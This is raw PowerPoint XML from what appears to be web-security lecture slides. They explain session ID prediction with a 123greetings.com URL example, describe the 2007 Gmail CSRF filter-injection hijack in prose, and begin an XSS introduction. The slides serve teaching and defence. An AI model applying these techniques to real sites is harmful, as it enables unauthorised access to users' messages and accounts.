            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The session ID authorizes the users actions on the website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Deducing or guessing the unique value that identifies a particular session or a user is enough to pose as a legitimate user and perform actions on the real users behalf.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Many websites use proprietary algorithms to generate session IDs which may not be cryptographically random. Sometimes these IDs are nothing more than a sequential increment or use a combination of variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The hacker typically launches the attack by reading these session IDs from a cookie, hidden form field or URL and calculates or brute forces subsequent session IDs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="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ltLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Credential/Session Prediction Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324"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522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AB0A57F-149C-42BC-A144-A1DD09394ED7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Attack on 123greetings.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>(refer the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>iDefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> whitepaper in references)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="955E4B"/>
              </a:solidFill>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>123greetings.com used to send users URLs like the following to view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://123greetings.com/view/AD30725122110120</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Look at the following set of successive URLs generated within a short period of time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://123greetings.com/view/AD30725122116211</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://123greetings.com/view/AD30725122118909</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://123greetings.com/view/AD30725122120803</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://123greetings.com/view/AD30725122122507</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>It turns out that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1500" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>so-called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1500" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> random number at the end of the URL string has the following format:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>AD3 – constant </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>07251221 – is the date and time at which the URL was sent (25 July 12:21 PST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>So we are left with only 5 digits of randomness out of the 16 digits!!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Implications :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>     With a fairly simple script  and some knowledge of time and date one can easily brute force a bunch of URLs and view greetings which are not meant to be viewed by him !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2200" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="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ltLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>CSRF* Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6451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532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470356E-A1ED-425E-A310-409BA93E6F38}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Google Gmail Hijack using CSRF (Sep 2007) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The victim user logs into Gmail as usual with his username and password. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Now, the victim decides to open another Firefox tab and visit another website. Unfortunately, this website happens to be malicious website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Upon loading, the website performs a multipart/form-data POST to one of the Gmail interfaces and injects a filter into the victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>s filter list.  This is possible because the user is still logged on into his Gmail account. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The attackers request forces the browser to think that the valid Gmail application is issuing the request. So it simply complies and sends the request to Gmail interface with the right credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The attacker writes a filter, which simply looks for emails with attachments and forward them to an email of their choice. This filter will automatically transfer all emails matching the rule. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that future emails will be forwarded as well. The attack will remain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" b="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>present</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> for as long as the victim has the filter within their filter list, even if the initial vulnerability, which was the cause of the injection, is fixed by Google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>*Cross Site Request Forgery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ltLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Client Side Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65541" name="Footer Placeholder 4"/>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8343BBE-5E17-4937-BA82-72A35EF0673D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B050202010402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a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55298" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>) is a type of computer security vulnerability typically found in Web applications. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
